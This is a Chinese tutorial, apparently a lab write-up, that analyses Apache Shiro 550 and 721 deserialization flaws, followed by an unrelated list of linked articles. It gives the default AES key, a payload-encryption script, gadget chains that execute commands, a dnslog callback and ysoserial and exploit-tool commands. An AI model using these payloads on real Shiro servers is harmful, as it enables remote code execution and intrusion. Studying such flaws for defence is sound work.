红队蓝军
红队蓝军

shiro反序列化

shiro550

环境搭建

https://codeload.github.com/apache/shiro/zip/shiro-root-1.2.4

配置pom.xml

   

        javax.servlet

        jstl

        runtime

   

   

        javax.servlet

        servlet-api

        provided

   

   

        org.slf4j

        slf4j-log4j12

        runtime

   

   

        log4j

        log4j

        runtime

   

   

        net.sourceforge.htmlunit

        htmlunit

        2.6

        test

   

   

        org.apache.shiro

        shiro-core

   

   

        org.apache.shiro

        shiro-web

   

   

        org.mortbay.jetty

        jetty

        ${jetty.version}

        test

   

   

        org.mortbay.jetty

        jsp-2.1-jetty

        ${jetty.version}

        test

   

   

        org.slf4j

        jcl-over-slf4j

        runtime

   

   

        jstl

        jstl

        1.2

   

可能出现的问题

无法解析插件 org.apache.maven.plugins:maven-clean-plugin:2.5

主要原理是因为maven默认用的是外网,会导致有些插件无法下载成功

解决方式:

将maven设置为国内镜像

修改maven3中的settings.xml文件

路径:xxxx\InteLiJ\plugins\maven\lib\maven3\conf

将标签的内容替换为

mirrorId

central

Human Readable Name

http://repo1.maven.org/maven2/

alimaven

aliyun maven

http://central.maven.org/maven2

central

alimaven

aliyun maven

http://maven.aliyun.com/nexus/content/repositories/central/

central

junit

junit Address/

http://jcenter.bintray.com/

central

然后重启maven即可

只需要将压缩包中的web目录解压,然后作为网站根目录即可

漏洞分析

加密过程

在ildea里点击两下Shift,搜索rememberMeSuccessfulLogin

对用户名就行序列化操作

跟进serialize

继续跟进 跟进serialize,这里就是真实的序列化操作

执行完serialize函数加入encrypt

可以看到有一个cipherService.encrypt函数,它其实是将序列化的内容进行aes加密,而getEncryptionCipherKey函数是获取密钥的函数

跟进getEncryptionCipherKey函数,发现返回的是encryptionCioherKey这个属性

getEncryptionCipherKey为AbstractRememberMeManager类中的方法,因此我们自己看构造方法

这里定义了一个常量DEFAULT_CIPHER_KEY_BYTES

跟进到这里会发现setEncryptionCipherKey方法其实就是将DEFAULT_CIPHER_KEY_BYTES赋值给了encryptionCipherKey,在这里就获得了密钥

进入rememberSerializedIdentity方法,这个方法的作用其实就是添加cookie

加密过程就结束了

解密过程

搜索getRememberedIdentity

获取http的Request和Response

获取Cookie内容

这里就是解密过程

在这里调用了反序列化

由于原生的shrio是无法利用cc链的,因此我们在这里直接利用URLDNS这条链

URLDNS

import java.io.*;

import java.lang.reflect.Field;

import java.net.URL;

import java.util.HashMap;

public class urldns {

    public static void main(String[] args) throws Exception {

        HashMap hashMap = new HashMap();

        URL url = new URL("http://rmu2na.dnslog.cn");

        Field f = URL.class.getDeclaredField("hashCode");

        f.setAccessible(true);

        // 这步是防止写入时触发dns查询,详见下文序列化条件总结

        f.set(url, 1);

        hashMap.put(url, "foo");

        f.set(url, -1);


        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("test.out"));

        oos.writeObject(hashMap);

        ObjectInputStream ois = new ObjectInputStream(new FileInputStream("test.out"));

        ois.readObject();


    }

}

由于反序列化的内容是二进制文件,因此需要利用脚本进行加密操作

import sys

import uuid

import base64

import subprocess

from Crypto.Cipher import AES

def get_file(name):

    with open(name,'rb') as f:

        data = f.read()

    return data

def en_aes(data):

    BS = AES.block_size

    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()

    key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")

    iv = uuid.uuid4().bytes

    encryptor = AES.new(key, AES.MODE_CBC, iv)

    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(pad(data)))

    return base64_ciphertext

if __name__ == '__main__':

    data = get_file("test.out")

    print(en_aes(data))

这里需要将Cookie中的JSESSIONID=xxx;删除掉才会触发服务器重新读取Cookie

由于Shrio对resolveClass进行了修改,导致数组类无法加载,因此原生的cc链是无法直接使用的

有cc依赖

package com.naihe;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;

import javassist.CannotCompileException;

import javassist.ClassPool;

import javassist.CtClass;

import javassist.NotFoundException;

import org.apache.commons.collections.functors.ConstantTransformer;

import org.apache.commons.collections.functors.InvokerTransformer;

import org.apache.commons.collections.keyvalue.TiedMapEntry;

import org.apache.commons.collections.map.LazyMap;

import java.io.*;

import java.lang.reflect.Field;

import java.util.HashMap;

import java.util.Map;

public class cc {

    public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, NotFoundException, CannotCompileException, ClassNotFoundException {

        //通过字节码构建恶意类

        ClassPool classPool= ClassPool.getDefault();

        String AbstractTranslet="com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet";

        classPool.appendClassPath(AbstractTranslet);

        CtClass payload=classPool.makeClass("CommonsCollections3");

        payload.setSuperclass(classPool.get(AbstractTranslet));

        payload.makeClassInitializer().setBody("java.lang.Runtime.getRuntime().exec(\"calc\");");

        byte[] bytes=payload.toBytecode();

        //CC3

        TemplatesImpl templates = new TemplatesImpl();

        Class aClass = templates.getClass();

        Field nameField = aClass.getDeclaredField("_name");

        nameField.setAccessible(true);

        nameField.set(templates,"aaaa");

        Field bytecodesField = aClass.getDeclaredField("_bytecodes");

        bytecodesField.setAccessible(true);

        bytecodesField.set(templates,new byte[][]{bytes});

        //CC2

        InvokerTransformer invokerTransformer = new InvokerTransformer("newTransformer", null, null);

        //CC6

        HashMap map = new HashMap<>();

        Map lazyMap = LazyMap.decorate(map, new ConstantTransformer(1));

        TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, templates);

        HashMap map2 = new HashMap<>();

        map2.put(tiedMapEntry,"bbb");

        lazyMap.remove(templates);

        Class c = LazyMap.class;

        Field factoryField = c.getDeclaredField("factory");

        factoryField.setAccessible(true);

        factoryField.set(lazyMap,invokerTransformer);

        serialize(map2);

    }

    public static void serialize(Object obj) throws IOException, ClassNotFoundException {

        ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("test.out"));

        objectOutputStream.writeObject(obj);

        objectOutputStream.close();

        unserialize("test.out");

    }

    public static Object unserialize(String Filename) throws IOException, ClassNotFoundException {

        ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream(Filename));

        Object object = objectInputStream.readObject();

        return object;

    }

}

无cc依赖

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;

import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;

import javassist.ClassPool;

import javassist.CtClass;

import org.apache.commons.beanutils.BeanComparator;

import java.io.*;

import java.lang.reflect.Field;

import java.util.PriorityQueue;

public class CB1 {

    // 修改值的方法,简化代码

    public static void setFieldValue(Object object, String fieldName, Object value) throws Exception{

        Field field = object.getClass().getDeclaredField(fieldName);

        field.setAccessible(true);

        field.set(object, value);

    }

    public static void main(String[] args) throws Exception {

        // 创建恶意类,用于报错抛出调用链

        ClassPool pool = ClassPool.getDefault();

        CtClass payload = pool.makeClass("EvilClass");

        payload.setSuperclass(pool.get("com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet"));

        payload.makeClassInitializer().setBody("new java.io.IOException().printStackTrace();");

        payload.makeClassInitializer().setBody("java.lang.Runtime.getRuntime().exec(\"calc\");");

        byte[] evilClass = payload.toBytecode();

        TemplatesImpl templates = new TemplatesImpl();

        setFieldValue(templates, "_bytecodes", new byte[][]{evilClass});

        setFieldValue(templates, "_name", "test");

        setFieldValue(templates,"_tfactory", new TransformerFactoryImpl());

        BeanComparator beanComparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);

        PriorityQueue queue = new PriorityQueue(2, beanComparator);

        queue.add("1");

        queue.add("1");

        setFieldValue(beanComparator, "property", "outputProperties");

        setFieldValue(queue, "queue", new Object[]{templates, templates});

        ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream("test.out"));

        out.writeObject(queue);

        ObjectInputStream in = new ObjectInputStream(new FileInputStream("test.out"));

        in.readObject();

    }

}

shiro721

漏洞原理

Apapche Shiro RememberMe Cookie 默认通过 AES-128-CBC 模式加密 , 这种加密模式容易受到 Padding Oracle Attack( Oracle 填充攻击 ) , 攻击者可以使用有效的 RememberMe Cookie 作为 Paddding Oracle Attack 的前缀 , 然后精心构造 RememberMe Cookie 值来实现反序列化漏洞攻击.

复现步骤:

1. 登录网站并且获取 RememberMe Cookie 值

2. 使用 RememberMe Cookie 值来作为 Padding Oracle Attack 的前缀

3. 通过 Padding Oracle Attack 的攻击方式精心构造可利用的 YSoSerial 反序列化数据

4. 将构造好的反序列化数据填充到 RememberMe Cookie 字段中并发送 , 即可在目标服务器上执行任意代码

需要通过爆破获取密钥,才能生成正确的rememberme cookie

用java  -jar ysoserial-master-6eca5bc740-1.jar CommonsBeanutils1 "ping gj9qn9.dnslog.cn" > payload.class

python shiro_exp.py  http://127.0.0.1:8080/samples-web-1.4.1/account/  7y9G8wmu+3c94D0kaxohut34n3ldwNnWxmrT9DQDEiSrQ7agYNnci1mh+IYQLmL8cehaMPcnBDclNaEN6eZrPvsEX7eApt5SJEZkmow+ZPsEsnh4wrnHoe7p8RjGVu6P/onx7nrFzZln9d4RC1N8vxEVPUlYZXU7xsMRs35Q8ziFH1EJ1jl/5eiDTn7Wx3yLbHCPyg6v+Qu5ADD+AMbvdHzlLOwY8Pfm5uqEKp36jIwsZjDcQJRhwyUjhAuRyqSUEFKzAq95XUYRaBKKsoxQwN6gD4z7G6lAIBY880CP0QIMhImmbHVfJti/rrnJ/RsxJtoeIH8TujlsEvcCGbJ3Od2XDbhilQUT57XralFArZB7tVCQE9/Vdce96jzR1TjD2rsPbg77eEUXOWbwkYBkJxFBex+p/YrLeJnxm9IvDijGHH2pZp9kCkej7uc8qPm+rH+V3xE0ChIxZXF5l9ScPsvHLJD+gAhgszg75pQnLiS5SOPG73GCj2gFFzzsKnCB  payload.class

检测工具

工具:

https://github.com/feihong-cs/ShiroExploit-Deprecated/releases/download/v2.51/ShiroExploit.V2.51.7z

你可能感兴趣的:(shiro反序列化)

  • 请简单介绍一下Shiro框架是什么?Shiro在Java安全领域的主要作用是什么?Shiro主要提供了哪些安全功能? AaronWang94 shirojavajava安全开发语言
    请简单介绍一下Shiro框架是什么?Shiro框架是一个强大且灵活的开源安全框架,为Java应用程序提供了全面的安全解决方案。它主要用于身份验证、授权、加密和会话管理等功能,可以轻松地集成到任何JavaWeb应用程序中,并提供了易于理解和使用的API,使开发人员能够快速实现安全特性。Shiro的核心组件包括Subject、SecurityManager和Realms。Subject代表了当前与应用
  • Asp .Net Core 系列:Asp .Net Core 集成 Newtonsoft.Json Code技术分享 .netcorejson
    简介Newtonsoft.Json是一个在.NET环境下开源的JSON格式序列化和反序列化的类库。它可以将.NET对象转换为JSON格式的字符串,也可以将JSON格式的字符串转换为.NET对象。这个类库在.NET开发中被广泛使用,因为它功能强大、易于使用,并且有良好的性能。使用Newtonsoft.Json,你可以方便地进行以下操作:序列化:将.NET对象转换为JSON字符串。这通常用于将数据发送
  • 安卓Java面试题 71- 80 ️ 邪神 Android面试题安卓面试题androidjava
    71.简述Andorid中的Parcel存储机制?Android中的Parcel机制实现了Bundle传递对象使用Bundle传递对象,首先要将其序列化,但是,在Android中要使用这种传递对象的方式需要用到AndroidParcel机制,即,Android实现的轻量级的高效的对象序列化和反序列化机制。JAVA中的Serialize机制,译成串行化、序列化……,其作用是能将数据对象存入字节流当中
  • 单例模式之枚举 HeroNet2010 Java单例模式java
    众所周知,在java中有多种方式创建单例:饿汉式,懒汉式,双重检测懒汉式,静态内部类等,这些单列模式各有缺点:有的类加载时就初始化,浪费内存有的不保证多线程安全有的因为加了synchronized同步锁导致并发效率较低以上的单例模式都能通过反射,反序列化,克隆等方式被破坏publicclassSingletonTestDoubleCheckimplementsCloneable,Serializa
  • 【python】 用来将对象持久化的 pickle 模块 咖 啡加剁椒 软件测试pythonwindows开发语言软件测试功能测试自动化测试程序人生
    pickle模块可以对一个Python对象的二进制进行序列化和反序列化。说白了,就是它能够实现任意对象与二进制直接的相互转化,也可以实现对象与文本之间的相互转化。比如,我程序里有一个python对象,我想把它存到磁盘里,于是我用pickle把他转到一个文本里。当后面我想使用的时候,读取出来时候依然是一个python对象。一、pickle模块下的方法pickle模块提供了以下4种方法:dump():
  • 解锁Golang数据编解码能力:encoding库完全解析 walkskyer golang标准库golang服务器网络
    解锁Golang数据编解码能力:encoding库完全解析简介为何重视`encoding`库`encoding`库的实战开发重要性JSON处理基本使用序列化与反序列化处理复杂JSON结构自定义序列化行为错误处理和性能优化建议XML处理基本概念和使用方法序列化与反序列化使用标签控制XML节点的名称、属性和命名空间处理复杂和嵌套的XML结构性能优化和错误处理CSV文件处理`encoding/csv`库
  • JAVA面试题28 CrazyMax_zh java开发语言
    面试题:Java中的静态变量和实例变量有何区别?它们存储在内存的哪个部分?答案:静态变量属于类,实例变量属于对象。静态变量在内存中只有一份拷贝,存储在方法区(JVM内存中的一部分),而实例变量每个对象都有自己的值,存储在堆内存中。面试题:Java中什么是序列化(Serialization)?如何实现序列化和反序列化?答案:序列化是将对象转换为字节序列以便存储或传输的过程。实现序列化需要让类实现Se
  • shiro 整合 spring 实战及源码详解 老马啸西风 java
    序言前面我们学习了如下内容:5分钟入门shiro安全框架实战笔记shiro整合spring实战及源码详解相信大家对于shiro已经有了最基本的认识,这一节我们一起来学习写如何将shiro与spring进行整合。spring整合maven依赖org.apache.shiroshiro-spring1.7.0org.springframeworkspring-context4.3.13.RELEASE
  • 关于TypeReference的使用 韩_师兄 技能点javajackson
    关于TypeReference的使用在项目中,有遇到TypeReference的使用,其主要在字符串转对象过程中,对于序列化和反序列化中也有效果,将字符串转换成自定义对象.1说明以常见为例,在com.alibaba.fastjson包下面的TypeReference类,是指Type的Reference,表示某类型的一个指向或者引用.protectedTypeReference(){//当前类父类的
  • Guava 工具类之Cache的使用 本地缓存组件 ʚ小华 guava缓存
    一.guavacache介绍1.介绍guavacache是Googleguava中提供的一款轻量级的本地缓存组件,其特点是简单、轻便、完善、扩展性强,内存管理机制也相对完善。2.使用缓存的优点1.减少了网络调用的开销2.减少了数据请求的序列化和反序列化二.guavacache分类guavacache提供了2种类型:Cache:创建1个缓存.LoadingCache:它能够通过CacheLoader
  • php session序列化,深入解析PHP中SESSION反序列化机制 罅天 phpsession序列化
    简介在php.ini中存在三项配置项:session.save_path=""--设置session的存储路径session.save_handler=""--设定用户自定义存储函数,如果想使用PHP内置会话存储机制之外的可以使用本函数(数据库等方式)session.auto_startboolen--指定会话模块是否在请求开始时启动一个会话,默认为0不启动session.serialize_ha
  • mysql 反序列化函数_参考手册PHP 序列化和反序列化的方法函数. - PHP教程 Alin John mysql反序列化函数
    PHP序列化和反序列化的方法函数我们在开发的过程中常常遇到需要把对象或者数组进行序列号存储,反序列化输出的情况。特别是当需要把数组存储到mysql数据库中时,我们时常需要将数组进行序列号操作。序列化(串行化):是将变量转换为可保存或传输的字符串的过程;反序列化(反串行化):就是在适当的时候把这个字符串再转化成原来的变量使用。这两个过程结合起来,可以轻松地存储和传输数据,使程序更具维护性。常见的ph
  • php反序列化语句实例,PHP反序列化的一些例子 李念橙橙 php反序列化语句实例
    之前web一直被PHP反序列化的一些问题困扰,现在痛定思痛,决定好好的总结一番(大佬请略过)一般反序列化能用的例子都是利用了PHP中的一些可以自动调用的特殊函数,类似于C++中的构造函数之类的,不需要其他函数调用即可自动运行。通常称这些函数为魔幻函数,常用的魔幻函数包括construct(),destruct(),sleep(),wakeup(),toString().首先我们以construct
  • php反序列化需要几个对象,PHP反序列化详解 丁天天 php反序列化需要几个对象
    PHP反序列化漏洞(PHP对象注入漏洞)PHP中有两个函数serialize()[用于序列化]和unserialize()[用于反序列化]这里一个使用了serialize函数序列化数值的例子classchybeta{var$test='123';}$class1=newchybeta;$class1_ser=serialize($class1);print_r($class1_ser);?>该例子
  • [PHP 反序列化参考手册] cl1mb3r phpandroid开发语言
    一、简单的反序列化题目1.P1task.phpname==='ctf'){echogetenv('FLAG');}}}unserialize($_GET['n']);exp.phpadmin="user";$this->passwd="123456";}publicfunction__destruct(){if($this->admin==="admin"&&$this->passwd==="ct
  • Winform中设置隐藏窗体且不在任务栏中显示 霸道流氓气质 C#winform
    场景Winform中设置程序开机自启动(修改注册表和配置自启动快捷方式):Winform中设置程序开机自启动(修改注册表和配置自启动快捷方式)_winfrom如何设置开启自动启动-CSDN博客通过以上方式设置winform程序开机自启动之后,需要启动后判断配置文件如果不为空则窗体隐藏,任务后台进行。Winform中实现保存配置到文件/项目启动时从文件中读取配置(序列化与反序列化对象):Winfor
  • 使用Jackson库进行JSON序列化和反序列化 才艺のblog jsonpython开发语言
    一、序言在现代Web开发中,JSON(JavaScriptObjectNotation)成为了一种广泛使用的数据格式,用于前后端数据传输和存储。Java是一种面向对象编程语言,而JSON是一种键值对格式的数据,因此在Java中,需要将Java对象转换为JSON字符串,或者将JSON字符串转换为Java对象。这个过程就是JSON的序列化和反序列化。对于Java中的JSON序列化和反序列化,有很多开源
  • [计算机网络]---序列化和反序列化 小蜗牛~向前冲 网络计算机网络
    前言作者:小蜗牛向前冲名言:我可以接受失败,但我不能接受放弃如果觉的博主的文章还不错的话,还请点赞,收藏,关注支持博主。如果发现有问题的地方欢迎❀大家在评论区指正目录一、再谈协议二、序列化和反序化1、网络版本计算器的场景搭建2、服务器构建3、客户端构建4、序列化和反序列化4.1自定义序列化和反序列化4.2json实现序列化和反序列化5、测试本期学习:重点理解序化和反序列化一、再谈协议在前面博客谈网
  • [H二叉树] lc297. 二叉树的序列化与反序列化(二叉树+前序遍历+中序遍历+面试经典) Ypuyu LeetCode
    文章目录1.题目来源2.题目解析1.题目来源链接:297.二叉树的序列化与反序列化相同:[剑指-Offer]37.序列化二叉树(层序遍历、前序遍历、递归、特殊情况)参考题解:BFS和DFS两种方式解决2.题目解析之前写过这题,但是当时还没有学算法,写的很垃圾。仅给前序遍历是无法建树的,必须有中序的加入才可以。可以证明,中序遍历+任一其它序遍历都可以唯一构建一颗二叉树。本题采用序列化方式构建二叉树,
  • ctf刷题 ctfshow【网鼎杯】 路向阳_ CTF学习网络安全
    Php-3、java-3、目录一、网鼎杯-青龙组-web--AreUserialZ1、源码见下:serialzcopy3、绕过语法详解:4、尝试绕过:二、php特性三、php反序列化漏洞四、Buuctf一、网鼎杯-青龙组-web--AreUserialZBuuctf1、源码见下:serialzcopyPhp反序列化:思路:先阅读源码,在分析思路//大致思路:新建一个对象filenameflag.p
  • ctfshow刷题(Java反序列化) V3g3t4ble java开发语言
    CTFshowJava反序列化web846urldns链importjava.io.ByteArrayOutputStream;importjava.io.IOException;importjava.io.ObjectOutput;importjava.io.ObjectOutputStream;importjava.lang.reflect.Field;importjava.net.URL;i
  • shrio跳转操作 + ajax 月1.2.3 springbootajax
    使用shiro框架的时候,在session过期之后实现跳转到登录界面,ajax操作不会直接跳转而是返回一个登录页面的html,并且不会进入controller逻辑,需要找到对应的方法进行重写,对ajax进行处理(FormAuthenticationFilter中的redirectToLogin方法重写)。
  • 035-安全开发-JavaEE应用&原生反序列化&重写方法&链条分析&触发类&类加载 wusuowei2986 安全java-eepython
    035-安全开发-JavaEE应用&原生反序列化&重写方法&链条分析&触发类&类加载#知识点:1、JavaEE-反序列化-解释&使用&安全2、JavaEE-安全-利用链&直接重写方法3、JavaEE-安全-利用链&外部重写方法演示案例:➢Java-原生使用-序列化&反序列化➢Java-安全问题-重写方法&触发方法➢Java-安全问题-可控其他类重写方法#Java序列化&反序列化-概念1、序列化与反
  • Caused by: com.alibaba.fastjson.JSONException: autoType is not support 风流倜傥唐伯虎
    那是因为你把数据存进redis中的时候,使用了GenericFastJsonRedisSerializer来序列化和反序列化redis的value值解决办法:1.返回对象必须要有个无参构造方法,否则报错2.可以使用JdkSerializationRedisSerializer,只不过JdkSerializationRedisSerializer在redis中保存的是二进制,而GenericFast
  • Flask——基本前后端数据传输示例 Irving.Gao pythonWebflaskpython后端
    文章目录步骤1:使用`requests`发送JSON数据步骤2:使用Flask接收并反序列化JSON数据要实现您的需求,我们可以通过两个步骤来完成:首先,使用Python的requests库发送JSON格式的数据;其次,使用Flask框架在服务器端接收这些数据并将其反序列化为字典格式。步骤1:使用requests发送JSON数据要发送JSON数据,您可以使用requests库的post方法。首先确
  • XMall 开源商城 SQL注入漏洞复现(CVE-2024-24112) OidBoy_G 漏洞复现web安全安全sql
    0x01产品简介XMall开源电商商城是开发者Exrick的一款基于SOA架构的分布式电商购物商城前后端分离前台商城:Vue全家桶后台管理:Dubbo/SSM/Elasticsearch/Redis/MySQL/ActiveMQ/Shiro/Zookeeper等。0x02漏洞概述XMall开源商城/item/list、/item/listSearch、/sys/log、/order/list、/m
  • 深入浅出理解数据的序列化和反序列化 gordon1986 后端序列化protobufThrift
    一般来说,数据的处理有两种类型。一种是在内存中,比如我们常见的结构体,list,数组等等。而另外一种就是把数据写到文件中或者在网络中进行传输,这个时候的数据传输说白了就是比特流,那么接受方如何解析这些接收到的比特流呢?这个时候就需要对数据进行序列化,把相应的数据转化成可以自解释比特流。然后接收方就可以通过反序列化的方法把这些比特流再转化成相应的结构体等等类型。各种语言自带的格式很多语言都有自带的序
  • 面试系列 - 序列化和反序列化详解 境里婆娑 面试职场和发展
    Java序列化是一种将对象转换为字节流的过程,可以将对象的状态保存到磁盘文件或通过网络传输。反序列化则是将字节流重新转换为对象的过程。Java提供了一个强大的序列化框架,允许你在对象的持久化和网络通信中使用它。一、Java序列化的基本原理Java序列化的基本原理是将一个Java对象转换为一个字节序列,以便将其保存到磁盘上的文件或通过网络发送到其他地方。这个字节序列可以随后被反序列化为原始对象。Ja
  • Go json Marshal & UnMarshal 的一点小 trick yeshan333 golangjson开发语言
    在编写WebService等涉及数据序列化和反序列化的场景,对于JSON类型的数据,在Go中我们经常会使用到encoding/jsonPackage。最近微有所感,小水一篇omitemptyJSON数据的UnMarshal我们经常会配合StructTags使用,让Struct的Filed与JSON数据的指定property绑定。如果要序列化为GoStruct的JSON数据对应的Fields相关的J
  • 449. 序列化和反序列化二叉搜索树 luckycoding 算法数据结构leetcode
    文章目录题意思路代码题意题目链接一棵树如果编码成string,然后解码回来。思路使用BFS,按节点保存起来,使用-1标识空指针;没有重复节点,直接模拟就好了;虽然可以使用先序遍历+中序遍历,还原树,不过这么写简单。代码/***Definitionforabinarytreenode.*structTreeNode{*intval;*TreeNode*left;*TreeNode*right;*Tr
  • Java实现的简单双向Map,支持重复Value superlxw1234 java双向map
    关键字:Java双向Map、DualHashBidiMap     有个需求,需要根据即时修改Map结构中的Value值,比如,将Map中所有value=V1的记录改成value=V2,key保持不变。   数据量比较大,遍历Map性能太差,这就需要根据Value先找到Key,然后去修改。   即:既要根据Key找Value,又要根据Value
  • PL/SQL触发器基础及例子 百合不是茶 oracle数据库触发器PL/SQL编程
      触发器的简介; 触发器的定义就是说某个条件成立的时候,触发器里面所定义的语句就会被自动的执行。因此触发器不需要人为的去调用,也不能调用。触发器和过程函数类似 过程函数必须要调用,   一个表中最多只能有12个触发器类型的,触发器和过程函数相似 触发器不需要调用直接执行, 触发时间:指明触发器何时执行,该值可取: before:表示在数据库动作之前触发
  • [时空与探索]穿越时空的一些问题 comsci 问题
          我们还没有进行过任何数学形式上的证明,仅仅是一个猜想.....       这个猜想就是; 任何有质量的物体(哪怕只有一微克)都不可能穿越时空,该物体强行穿越时空的时候,物体的质量会与时空粒子产生反应,物体会变成暗物质,也就是说,任何物体穿越时空会变成暗物质..(暗物质就我的理
  • easy ui datagrid上移下移一行 商人shang js上移下移easyuidatagrid
    /** * 向上移动一行 * * @param dg * @param row */ function moveupRow(dg, row) { var datagrid = $(dg); var index = datagrid.datagrid("getRowIndex", row); if (isFirstRow(dg, row)) {
  • Java反射 oloz 反射
    本人菜鸟,今天恰好有时间,写写博客,总结复习一下java反射方面的知识,欢迎大家探讨交流学习指教 首先看看java中的Class package demo; public class ClassTest { /*先了解java中的Class*/ public static void main(String[] args) { //任何一个类都
  • springMVC 使用JSR-303 Validation验证 杨白白 springmvc
    JSR-303是一个数据验证的规范,但是spring并没有对其进行实现,Hibernate Validator是实现了这一规范的,通过此这个实现来讲SpringMVC对JSR-303的支持。 JSR-303的校验是基于注解的,首先要把这些注解标记在需要验证的实体类的属性上或是其对应的get方法上。 登录需要验证类 public class Login { @NotEmpty
  • log4j 香水浓 log4j
    log4j.rootCategory=DEBUG, STDOUT, DAILYFILE, HTML, DATABASE #log4j.rootCategory=DEBUG, STDOUT, DAILYFILE, ROLLINGFILE, HTML #console log4j.appender.STDOUT=org.apache.log4j.ConsoleAppender log4
  • 使用ajax和history.pushState无刷新改变页面URL agevs jquery框架Ajaxhtml5chrome
    表现 如果你使用chrome或者firefox等浏览器访问本博客、github.com、plus.google.com等网站时,细心的你会发现页面之间的点击是通过ajax异步请求的,同时页面的URL发生了了改变。并且能够很好的支持浏览器前进和后退。 是什么有这么强大的功能呢? HTML5里引用了新的API,history.pushState和history.replaceState,就是通过
  • centos中文乱码 AILIKES centosOSssh
    一、CentOS系统访问 g.cn ,发现中文乱码。 于是用以前的方式:yum -y install fonts-chinese CentOS系统安装后,还是不能显示中文字体。我使用 gedit 编辑源码,其中文注释也为乱码。       后来,终于找到以下方法可以解决,需要两个中文支持的包: fonts-chinese-3.02-12.
  • 触发器 baalwolf 触发器
    触发器(trigger):监视某种情况,并触发某种操作。 触发器创建语法四要素:1.监视地点(table) 2.监视事件(insert/update/delete) 3.触发时间(after/before) 4.触发事件(insert/update/delete) 语法: create trigger triggerName after/before 
  • JS正则表达式的i m g bijian1013 JavaScript正则表达式
            g:表示全局(global)模式,即模式将被应用于所有字符串,而非在发现第一个匹配项时立即停止。         i:表示不区分大小写(case-insensitive)模式,即在确定匹配项时忽略模式与字符串的大小写。         m:表示
  • HTML5模式和Hashbang模式 bijian1013 JavaScriptAngularJSHashbang模式HTML5模式
            我们可以用$locationProvider来配置$location服务(可以采用注入的方式,就像AngularJS中其他所有东西一样)。这里provider的两个参数很有意思,介绍如下。 html5Mode         一个布尔值,标识$location服务是否运行在HTML5模式下。 ha
  • [Maven学习笔记六]Maven生命周期 bit1129 maven
    从mvn test的输出开始说起   当我们在user-core中执行mvn test时,执行的输出如下:   /software/devsoftware/jdk1.7.0_55/bin/java -Dmaven.home=/software/devsoftware/apache-maven-3.2.1 -Dclassworlds.conf=/software/devs
  • 【Hadoop七】基于Yarn的Hadoop Map Reduce容错 bit1129 hadoop
    运行于Yarn的Map Reduce作业,可能发生失败的点包括 Task Failure Application Master Failure Node Manager Failure Resource Manager Failure 1. Task Failure 任务执行过程中产生的异常和JVM的意外终止会汇报给Application Master。僵死的任务也会被A
  • 记一次数据推送的异常解决端口解决 ronin47 记一次数据推送的异常解决
       需求:从db获取数据然后推送到B         程序开发完成,上jboss,刚开始报了很多错,逐一解决,可最后显示连接不到数据库。机房的同事说可以ping 通。     自已画了个图,逐一排除,把linux 防火墙 和 setenforce 设置最低。    service iptables stop
  • 巧用视错觉-UI更有趣 brotherlamp UIui视频ui教程ui自学ui资料
    我们每个人在生活中都曾感受过视错觉(optical illusion)的魅力。 视错觉现象是双眼跟我们开的一个玩笑,而我们往往还心甘情愿地接受我们看到的假象。其实不止如此,视觉错现象的背后还有一个重要的科学原理——格式塔原理。 格式塔原理解释了人们如何以视觉方式感觉物体,以及图像的结构,视角,大小等要素是如何影响我们的视觉的。 在下面这篇文章中,我们首先会简单介绍一下格式塔原理中的基本概念,
  • 线段树-poj1177-N个矩形求边长(离散化+扫描线) bylijinnan 数据结构算法线段树
    package com.ljn.base; import java.util.Arrays; import java.util.Comparator; import java.util.Set; import java.util.TreeSet; /** * POJ 1177 (线段树+离散化+扫描线),题目链接为http://poj.org/problem?id=1177
  • HTTP协议详解 chicony http协议
    引言                                 
  • Scala设计模式 chenchao051 设计模式scala
    Scala设计模式                我的话: 在国外网站上看到一篇文章,里面详细描述了很多设计模式,并且用Java及Scala两种语言描述,清晰的让我们看到各种常规的设计模式,在Scala中是如何在语言特性层面直接支持的。基于文章很nice,我利用今天的空闲时间将其翻译,希望大家能一起学习,讨论。翻译
  • 安装mysql daizj mysql安装
    安装mysql   (1)删除linux上已经安装的mysql相关库信息。rpm  -e  xxxxxxx   --nodeps (强制删除)      执行命令rpm -qa |grep mysql 检查是否删除干净   (2)执行命令  rpm -i MySQL-server-5.5.31-2.el
  • HTTP状态码大全 dcj3sjt126com http状态码
    完整的 HTTP 1.1规范说明书来自于RFC 2616,你可以在http://www.talentdigger.cn/home/link.php?url=d3d3LnJmYy1lZGl0b3Iub3JnLw%3D%3D在线查阅。HTTP 1.1的状态码被标记为新特性,因为许多浏览器只支持 HTTP 1.0。你应只把状态码发送给支持 HTTP 1.1的客户端,支持协议版本可以通过调用request
  • asihttprequest上传图片 dcj3sjt126com ASIHTTPRequest
    NSURL *url =@"yourURL"; ASIFormDataRequest*currentRequest =[ASIFormDataRequest requestWithURL:url]; [currentRequest setPostFormat:ASIMultipartFormDataPostFormat];[currentRequest se
  • C语言中,关键字static的作用 e200702084 C++cC#
    在C语言中,关键字static有三个明显的作用: 1)在函数体,局部的static变量。生存期为程序的整个生命周期,(它存活多长时间);作用域却在函数体内(它在什么地方能被访问(空间))。 一个被声明为静态的变量在这一函数被调用过程中维持其值不变。因为它分配在静态存储区,函数调用结束后并不释放单元,但是在其它的作用域的无法访问。当再次调用这个函数时,这个局部的静态变量还存活,而且用在它的访
  • win7/8使用curl geeksun win7
    1.  WIN7/8下要使用curl,需要下载curl-7.20.0-win64-ssl-sspi.zip和Win64OpenSSL_Light-1_0_2d.exe。 下载地址:  http://curl.haxx.se/download.html 请选择不带SSL的版本,否则还需要安装SSL的支持包   2.  可以给Windows增加c
  • Creating a Shared Repository; Users Sharing The Repository hongtoushizi git
